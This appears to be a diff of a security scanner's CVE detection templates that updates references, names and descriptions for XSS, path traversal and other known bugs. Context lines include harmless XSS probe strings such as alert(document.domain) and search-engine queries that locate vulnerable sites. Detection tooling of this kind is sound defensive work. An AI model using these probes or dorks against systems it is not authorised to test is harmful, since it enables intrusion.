     8 + WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
    9 9   reference:
    10 10   - https://www.exploit-db.com/exploits/5194
    11 11   - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
    skipped 24 lines
    36 36   status:
    37 37   - 200
    38 38   
     39 + 
     40 +# Enhanced by mp on 2022/08/31
     41 + 
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2011/CVE-2011-2744.yaml
    skipped 6 lines
    7 7   description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
    8 8   reference:
    9 9   - https://www.exploit-db.com/exploits/35945
    10  - - https://www.cvedetails.com/cve/CVE-2011-2744
    11 10   - http://www.openwall.com/lists/oss-security/2011/07/13/6
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2011-2744
    12 12   - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/
    13 13   classification:
    14 14   cve-id: CVE-2011-2744
    skipped 20 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2011/CVE-2011-4804.yaml
    skipped 6 lines
    7 7   description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
    8 8   reference:
    9 9   - https://www.exploit-db.com/exploits/36598
    10  - - https://www.cvedetails.com/cve/CVE-2011-4804
    11 10   - http://web.archive.org/web/20140802122115/http://secunia.com/advisories/46844/
    12 11   - http://web.archive.org/web/20210121214308/https://www.securityfocus.com/bid/48944/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2011-4804
    13 13   remediation: Upgrade to a supported version.
    14 14   classification:
    15 15   cve-id: CVE-2011-4804
    skipped 20 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2012/CVE-2012-0896.yaml
    skipped 6 lines
    7 7   description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
    8 8   reference:
    9 9   - https://packetstormsecurity.com/files/108631/
    10  - - https://www.cvedetails.com/cve/CVE-2012-0896
    11 10   - http://web.archive.org/web/20140804110141/http://secunia.com/advisories/47529/
    12 11   - http://plugins.trac.wordpress.org/changeset/488883/count-per-day
     12 + - https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896
    13 13   classification:
    14 14   cve-id: CVE-2012-0896
    15 15   metadata:
    skipped 21 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2013/CVE-2013-5979.yaml
    skipped 7 lines
    8 8   reference:
    9 9   - https://www.exploit-db.com/exploits/26955
    10 10   - https://nvd.nist.gov/vuln/detail/CVE-2013-5979
    11  - - https://www.cvedetails.com/cve/CVE-2013-5979
    12 11   - https://bugs.launchpad.net/xibo/+bug/1093967
    13 12   classification:
    14 13   cve-id: CVE-2013-5979
    skipped 20 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2013/CVE-2013-6281.yaml
    skipped 17 lines
    18 18   cve-id: CVE-2013-6281
    19 19   cwe-id: CWE-79
    20 20   metadata:
    21  - google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet
     21 + google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet
    22 22   verified: "true"
    23 23   tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin
    24 24   
    skipped 26 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2014/CVE-2014-10037.yaml
    skipped 6 lines
    7 7   description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
    8 8   reference:
    9 9   - https://www.exploit-db.com/exploits/30865
    10  - - https://www.cvedetails.com/cve/CVE-2014-10037
    11 10   - https://nvd.nist.gov/vuln/detail/CVE-2014-10037
    12 11   - http://www.exploit-db.com/exploits/30865
    13 12   classification:
    skipped 21 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2014/CVE-2014-5368.yaml
    skipped 7 lines
    8 8   reference:
    9 9   - https://nvd.nist.gov/vuln/detail/CVE-2014-5368
    10 10   - https://www.exploit-db.com/exploits/39287
    11  - - https://www.cvedetails.com/cve/CVE-2014-5368
    12 11   - http://seclists.org/oss-sec/2014/q3/417
    13 12   classification:
    14 13   cve-id: CVE-2014-5368
    skipped 24 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2014/CVE-2014-8799.yaml
    skipped 7 lines
    8 8   reference:
    9 9   - https://nvd.nist.gov/vuln/detail/CVE-2014-8799
    10 10   - https://www.exploit-db.com/exploits/35346
    11  - - https://www.cvedetails.com/cve/CVE-2014-8799
    12 11   - https://wordpress.org/plugins/dukapress/changelog/
    13 12   classification:
    14 13   cve-id: CVE-2014-8799
    skipped 26 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2015/CVE-2015-1579.yaml
    skipped 16 lines
    17 17   cve-id: CVE-2015-1579
    18 18   cwe-id: CWE-22
    19 19   metadata:
    20  - google-dork: inurl:/wp-content/plugins/revslider
     20 + google-query: inurl:/wp-content/plugins/revslider
    21 21   tags: wordpress,wp-plugin,lfi,revslider,wp,wpscan,cve,cve2015
    22 22   
    23 23  requests:
    skipped 22 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2015/CVE-2015-4127.yaml
    1 1  id: CVE-2015-4127
    2 2   
    3 3  info:
    4  - name: WordPress Plugin church_admin - Cross-Site Scripting (XSS)
     4 + name: WordPress Church Admin <0.810 - Cross-Site Scripting
    5 5   author: daffainfo
    6 6   severity: medium
    7 7   description: |
    8  - Cross-site scripting (XSS) vulnerability in the church_admin plugin before 0.810 for WordPress allows remote attackers to inject arbitrary web script or HTML via the address parameter, as demonstrated by a request to index.php/2015/05/21/church_admin-registration-form/.
     8 + WordPress Church Admin plugin before 0.810 allows remote attackers to inject arbitrary web script or HTML via the address parameter via index.php/2015/05/21/church_admin-registration-form/.
    9 9   reference:
    10 10   - https://www.exploit-db.com/exploits/37112
    11 11   - https://wpscan.com/vulnerability/2d5b3707-f58a-4154-93cb-93f7058e3408
    12  - - https://nvd.nist.gov/vuln/detail/CVE-2015-4127
    13 12   - https://wordpress.org/plugins/church-admin/changelog/
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2015-4127
    14 14   classification:
    15 15   cve-id: CVE-2015-4127
    16 16   tags: wp-plugin,wp,edb,wpscan,cve,cve2015,wordpress,xss
    skipped 19 lines
    36 36   status:
    37 37   - 200
    38 38   
     39 +# Enhanced by mp on 2022/08/31
     40 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2016/CVE-2016-2389.yaml
    skipped 6 lines
    7 7   description: SAP xMII 15.0 for SAP NetWeaver 7.4 is susceptible to a local file inclusion vulnerability in the GetFileList function. This can allow remote attackers to read arbitrary files via a .. (dot dot) in the path parameter to /Catalog, aka SAP Security Note 2230978.
    8 8   reference:
    9 9   - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
    10  - - https://www.cvedetails.com/cve/CVE-2016-2389
    11 10   - http://packetstormsecurity.com/files/137046/SAP-MII-15.0-Directory-Traversal.html
    12 11   - https://www.exploit-db.com/exploits/39837/
    13 12   - https://nvd.nist.gov/vuln/detail/CVE-2016-2389
    skipped 27 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2016/CVE-2016-6601.yaml
    skipped 5 lines
    6 6   severity: high
    7 7   description: Directory traversal vulnerability in the file download functionality in ZOHO WebNMS Framework 5.2 and 5.2 SP1 allows remote attackers to read arbitrary files via a .. (dot dot) in the fileName parameter to servlets/FetchFile
    8 8   reference:
    9  - - https://www.cvedetails.com/cve/CVE-2016-6601
    10 9   - https://github.com/pedrib/PoC/blob/master/advisories/webnms-5.2-sp1-pwn.txt
    11 10   - https://www.exploit-db.com/exploits/40229/
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2016-6601
    12 12   classification:
    13 13   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    14 14   cvss-score: 7.5
    skipped 19 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2017/CVE-2017-11629.yaml
    1 1  id: CVE-2017-11629
    2 2   
    3 3  info:
    4  - name: FineCms 5.0.10 - Cross Site Scripting
     4 + name: FineCMS <=5.0.10 - Cross-Site Scripting
    5 5   author: ritikchaddha
    6 6   severity: medium
    7 7   description: |
    8  - dayrui FineCms through 5.0.10 has Cross Site Scripting (XSS) in controllers/api.php via the function parameter in a c=api&m=data2 request.
     8 + FineCMS through 5.0.10 contains a cross-site scripting vulnerability in controllers/api.php via the function parameter in a c=api&m=data2 request.
    9 9   reference:
    10 10   - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#URL-Redirector-Abuse
     11 + - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS
    11 12   - https://nvd.nist.gov/vuln/detail/CVE-2017-11629/
    12  - - http://lorexxar.cn/2017/07/20/FineCMS%20multi%20vulnerablity%20before%20v5.0.9/#api-php-Reflected-XSS
    13 13   classification:
    14 14   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 15   cvss-score: 6.1
    skipped 24 lines
    40 40   status:
    41 41   - 200
    42 42   
     43 +# Enhanced by mp on 2022/08/31
     44 + 
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2017/CVE-2017-5521.yaml
    skipped 16 lines
    17 17   cvss-score: 8.1
    18 18   cve-id: CVE-2017-5521
    19 19   cwe-id: CWE-200
    20  - tags: cve,cve2017,auth-bypass,netgear,router
     20 + tags: cve,cve2017,auth-bypass,netgear,router,kev
    21 21   
    22 22  requests:
    23 23   - method: GET
    skipped 18 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2018/CVE-2018-19386.yaml
    1 1  id: CVE-2018-19386
    2 2   
    3 3  info:
    4  - name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
     4 + name: SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting
    5 5   author: pikpikcu
    6 6   severity: medium
    7  - description: SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
     7 + description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
    8 8   reference:
    9 9   - https://www.cvedetails.com/cve/CVE-2018-19386/
    10 10   - https://i.imgur.com/Y7t2AD6.png
    11 11   - https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19386
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 6.1
    skipped 14 lines
    29 30   - type: word
    30 31   words:
    31 32   - '<a href="javascript:alert(document.domain)//'
     33 + 
     34 +# Enhanced by mp on 2022/08/31
     35 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2018/CVE-2018-19439.yaml
    1 1  id: CVE-2018-19439
    2 2   
    3 3  info:
    4  - name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
     4 + name: Oracle Secure Global Desktop Administration Console 4.4 - Cross-Site Scripting
    5 5   author: madrobot,dwisiswant0
    6 6   severity: medium
    7  - description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
     7 + description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.
    8 8   reference:
    9 9   - http://web.archive.org/web/20210124221313/https://www.securityfocus.com/bid/106006/
    10  - - http://seclists.org/fulldisclosure/2018/Nov/58
    11 10   - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19439
     12 + - http://seclists.org/fulldisclosure/2018/Nov/58
     13 + remediation: Fixed in later versions including 5.4.
    12 14   classification:
    13 15   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 16   cvss-score: 6.1
    skipped 11 lines
    26 28   - "<script>alert(1337)</script><!--</TITLE>"
    27 29   part: body
    28 30   
     31 +# Enhanced by mp on 2022/08/31
     32 + 
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2018/CVE-2018-19749.yaml
    skipped 4 lines
    5 5   author: arafatansari
    6 6   severity: medium
    7 7   description: |
    8  - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/account-owner.php Owner name field.
     8 + DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field.
    9 9   reference:
    10 10   - https://github.com/domainmod/domainmod/issues/81
    11 11   - https://www.exploit-db.com/exploits/45941/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19749
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 4.8
    skipped 35 lines
    50 51   - "contains(body_3, '><script>alert(document.domain)</script></a>')"
    51 52   condition: and
    52 53   
     54 +# Enhanced by mp on 2022/08/31
     55 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2018/CVE-2018-19751.yaml
    skipped 4 lines
    5 5   author: arafatansari
    6 6   severity: medium
    7 7   description: |
    8  - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /admin/ssl-fields/add.php Display Name, Description & Notes fields parameters.
     8 + DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters.
    9 9   reference:
    10 10   - https://www.exploit-db.com/exploits/45947/
    11  - - https://nvd.nist.gov/vuln/detail/CVE-2018-19751
    12 11   - https://github.com/domainmod/domainmod/issues/83
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19751
    13 13   classification:
    14 14   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    15 15   cvss-score: 4.8
    skipped 43 lines
    59 59   status:
    60 60   - 200
    61 61   
     62 +# Enhanced by mp on 2022/08/31
     63 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2018/CVE-2018-19752.yaml
    skipped 4 lines
    5 5   author: arafatansari
    6 6   severity: medium
    7 7   description: |
    8  - DomainMOD through 4.11.01 has XSS via the assets/add/registrar.php notes,registrar field.
     8 + DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar.
    9 9   reference:
    10  - - https://nvd.nist.gov/vuln/detail/CVE-2018-19752
    11 10   - https://github.com/domainmod/domainmod/issues/84
    12 11   - https://www.exploit-db.com/exploits/45949/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19752
    13 13   classification:
    14 14   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    15 15   cvss-score: 4.8
    skipped 42 lines
    58 58   status:
    59 59   - 200
    60 60   
     61 +# Enhanced by mp on 2022/08/31
     62 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2018/CVE-2018-19877.yaml
    1 1  id: CVE-2018-19877
    2 2   
    3 3  info:
    4  - name: Adiscon LogAnalyzer 4.1.7 - Cross Site Scripting
     4 + name: Adiscon LogAnalyzer <4.1.7 - Cross-Site Scripting
    5 5   author: arafatansari
    6 6   severity: medium
    7 7   description: |
    8  - Adiscon LogAnalyzer before 4.1.7 is affected by Cross-Site Scripting (XSS) in the 'referer' parameter of the login.php file.
     8 + Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file.
    9 9   reference:
    10 10   - https://loganalyzer.adiscon.com/news/loganalyzer-v4-1-7-v4-stable-released/
    11 11   - https://www.exploit-db.com/exploits/45958/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19877
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 6.1
    skipped 24 lines
    39 40   status:
    40 41   - 200
    41 42   
     43 +# Enhanced by mp on 2022/08/31
     44 + 
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2018/CVE-2018-19892.yaml
    skipped 4 lines
    5 5   author: arafatansari
    6 6   severity: medium
    7 7   description: |
    8  - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via /domain//admin/dw/add-server.php DisplayName parameters.
     8 + DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters.
    9 9   reference:
    10 10   - https://www.exploit-db.com/exploits/45959
    11 11   - https://github.com/domainmod/domainmod/issues/85
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19892
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 4.8
    skipped 42 lines
    57 58   status:
    58 59   - 200
    59 60   
     61 +# Enhanced by mp on 2022/08/31
     62 + 
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2018/CVE-2018-19914.yaml
    skipped 4 lines
    5 5   author: arafatansari
    6 6   severity: medium
    7 7   description: |
    8  - DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via assets/add/dns.php Profile Name or notes field.
     8 + DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field.
    9 9   reference:
    10 10   - https://www.exploit-db.com/exploits/46375/
    11 11   - https://github.com/domainmod/domainmod/issues/87
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19914
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 4.8
    skipped 35 lines
    50 51   - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
    51 52   condition: and
    52 53   
     54 +# Enhanced by mp on 2022/08/31
     55 + 
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2018/CVE-2018-20526.yaml
    skipped 16 lines
    17 17   cve-id: CVE-2018-20526
    18 18   cwe-id: CWE-434
    19 19   metadata:
    20  - google-dork: intitle:"Roxy file manager"
     20 + google-query: intitle:"Roxy file manager"
    21 21   verified: "true"
    22 22   tags: cve,cve2018,roxy,fileman,rce,fileupload,intrusive,packetstorm,edb
    23 23   
    skipped 58 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2018/CVE-2018-2628.yaml
    skipped 15 lines
    16 16   cvss-score: 9.8
    17 17   cve-id: CVE-2018-2628
    18 18   cwe-id: CWE-502
    19  - tags: cve,cve2018,oracle,weblogic,network,deserialization
     19 + tags: cve,cve2018,oracle,weblogic,network,deserialization,kev
    20 20   
    21 21  network:
    22 22   - inputs:
    skipped 18 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2018/CVE-2018-5715.yaml
    skipped 15 lines
    16 16   cve-id: CVE-2018-5715
    17 17   cwe-id: CWE-79
    18 18   metadata:
    19  - google-dork: intext:"SugarCRM Inc. All Rights Reserved"
     19 + google-query: intext:"SugarCRM Inc. All Rights Reserved"
    20 20   shodan-query: http.html:"SugarCRM Inc. All Rights Reserved"
    21 21   tags: sugarcrm,xss,edb,cve,cve2018
    22 22   
    skipped 23 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-1010287.yaml
    skipped 15 lines
    16 16   cve-id: CVE-2019-1010287
    17 17   cwe-id: CWE-79
    18 18   metadata:
    19  - google-dork: inurl:"/timesheet/login.php"
     19 + google-query: inurl:"/timesheet/login.php"
    20 20   tags: cve,cve2019,timesheet,xss
    21 21   
    22 22  requests:
    skipped 21 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-1010290.yaml
    skipped 6 lines
    7 7   description: Babel Multilingual site Babel All is affected by Open Redirection The impact is Redirection to any URL, which is supplied to redirect in a newurl parameter. The component is redirect The attack vector is The victim must open a link created by an attacker
    8 8   reference:
    9 9   - https://untrustednetwork.net/en/2019/02/20/open-redirection-vulnerability-in-babel/
    10  - - https://www.cvedetails.com/cve/CVE-2019-1010290
    11 10   - http://dev.cmsmadesimple.org/project/files/729
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2019-1010290
    12 12   classification:
    13 13   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 14   cvss-score: 6.1
    skipped 15 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-12593.yaml
    skipped 15 lines
    16 16   cve-id: CVE-2019-12593
    17 17   cwe-id: CWE-22
    18 18   metadata:
    19  - google-dork: Powered By IceWarp 10.4.4
     19 + google-query: Powered By IceWarp 10.4.4
    20 20   shodan-query: title:"icewarp"
    21 21   tags: cve,cve2019,lfi,icewarp
    22 22   
    skipped 19 lines
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-14974.yaml
    skipped 3 lines
    4 4   name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
    5 5   author: madrobot
    6 6   severity: medium
    7  - description: SugarCRM Enterprise 9.0.0 allows mobile/error-not-supported-platform.html?desktop_url= XSS.
     7 + description: SugarCRM Enterprise 9.0.0 contains a cross-site scripting vulnerability via mobile/error-not-supported-platform.html?desktop_url.
    8 8   reference:
    9 9   - https://www.exploit-db.com/exploits/47247
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2019-14974
    10 11   classification:
    11 12   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    12 13   cvss-score: 6.1
    skipped 15 lines
    28 29   - "url = window.location.search.split(\"?desktop_url=\")[1]"
    29 30   part: body
    30 31   
     32 +# Enhanced by mp on 2022/08/31
     33 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-15501.yaml
    1 1  id: CVE-2019-15501
    2 2   
    3 3  info:
    4  - name: LSoft ListServ - XSS
     4 + name: L-Soft LISTSERV <16.5-2018a - Cross-Site Scripting
    5 5   author: LogicalHunter
    6 6   severity: medium
    7  - description: Reflected cross site scripting (XSS) in L-Soft LISTSERV before 16.5-2018a exists via the /scripts/wa.exe OK parameter.
     7 + description: L-Soft LISTSERV before 16.5-2018a contains a reflected cross-site scripting vulnerability via the /scripts/wa.exe OK parameter.
    8 8   reference:
    9 9   - https://www.exploit-db.com/exploits/47302
    10 10   - http://www.lsoft.com/manuals/16.5/LISTSERV16.5-2018a_WhatsNew.pdf
    11  - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15501
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15501
    12 12   classification:
    13 13   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 14   cvss-score: 6.1
    skipped 22 lines
    37 37   status:
    38 38   - 200
    39 39   
     40 +# Enhanced by mp on 2022/08/31
     41 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-15811.yaml
    1 1  id: CVE-2019-15811
    2 2   
    3 3  info:
    4  - name: DomainMOD 4.13.0 - Cross-Site Scripting
     4 + name: DomainMOD <=4.13.0 - Cross-Site Scripting
    5 5   author: arafatansari
    6 6   severity: medium
    7 7   description: |
    8  - DomainMOD 4.13.0 is vulnerable to Cross Site Scripting (XSS) via /reporting/domains/cost-by-month.php in Daterange parameters.
     8 + DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.
    9 9   reference:
    10 10   - https://www.exploit-db.com/exploits/47325
    11 11   - https://github.com/domainmod/domainmod/issues/108
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15811
    12 13   - https://zerodays.lol/
    13 14   classification:
    14 15   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    skipped 30 lines
    45 46   - 'contains(body_2, "DomainMOD")'
    46 47   condition: and
    47 48   
     49 +# Enhanced by mp on 2022/08/31
     50 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-15889.yaml
    1 1  id: CVE-2019-15889
    2 2   
    3 3  info:
    4  - name: WordPress Plugin Download Manager 2.9.93 - Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress Download Manager <2.9.94 - Cross-Site Scripting
    5 5   author: daffainfo
    6 6   severity: medium
    7  - description: The download-manager plugin before 2.9.94 for WordPress has XSS via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
     7 + description: WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.
    8 8   reference:
    9  - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15889
    10 9   - https://www.cybersecurity-help.cz/vdb/SB2019041819
    11 10   - https://wordpress.org/plugins/download-manager/#developers
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15889
    12 12   classification:
    13 13   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 14   cvss-score: 6.1
    skipped 22 lines
    37 37   status:
    38 38   - 200
    39 39   
     40 +# Enhanced by mp on 2022/08/31
     41 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-16332.yaml
    1 1  id: CVE-2019-16332
    2 2   
    3 3  info:
    4  - name: API Bearer Auth <= 20181229 - Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress API Bearer Auth <20190907 - Cross-Site Scripting
    5 5   author: daffainfo
    6 6   severity: medium
    7  - description: In the api-bearer-auth plugin before 20190907 for WordPress, the server parameter is not correctly filtered in the swagger-config.yaml.php file, and it is possible to inject JavaScript code, aka XSS.
     7 + description: WordPress API Bearer Auth plugin before 20190907 contains a cross-site scripting vulnerability. The server parameter is not correctly filtered in swagger-config.yaml.php.
    8 8   reference:
    9 9   - https://plugins.trac.wordpress.org/changeset/2152730
    10 10   - https://wordpress.org/plugins/api-bearer-auth/#developers
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2019-16332
    11 12   classification:
    12 13   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 14   cvss-score: 6.1
    skipped 22 lines
    36 37   status:
    37 38   - 200
    38 39   
     40 +# Enhanced by mp on 2022/08/31
     41 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-16525.yaml
    1 1  id: CVE-2019-16525
    2 2   
    3 3  info:
    4  - name: Wordpress Plugin Checklist <= 1.1.5 - Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress Checklist <1.1.9 - Cross-Site Scripting
    5 5   author: daffainfo
    6 6   severity: medium
    7  - description: An XSS issue was discovered in the checklist plugin before 1.1.9 for WordPress. The fill parameter is not correctly filtered in the checklist-icon.php file, and it is possible to inject JavaScript code.
     7 + description: WordPress Checklist plugin before 1.1.9 contains a cross-site scripting vulnerability. The fill parameter is not correctly filtered in the checklist-icon.php file.
    8 8   reference:
    9  - - https://nvd.nist.gov/vuln/detail/CVE-2019-16525
    10 9   - https://wordpress.org/plugins/checklist/#developers
    11 10   - https://packetstormsecurity.com/files/154436/WordPress-Checklist-1.1.5-Cross-Site-Scripting.html
    12 11   - https://plugins.trac.wordpress.org/changeset/2155029/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2019-16525
    13 13   classification:
    14 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 15   cvss-score: 6.1
    skipped 22 lines
    38 38   status:
    39 39   - 200
    40 40   
     41 +# Enhanced by mp on 2022/08/31
     42 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-16931.yaml
    1 1  id: CVE-2019-16931
    2 2   
    3 3  info:
    4  - name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS)
     4 + name: WordPress Visualizer <3.3.1 - Cross-Site Scripting
    5 5   author: ritikchaddha
    6 6   severity: medium
    7 7   description: |
    8  - By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart.
     8 + WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard.
    9 9   reference:
    10 10   - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44
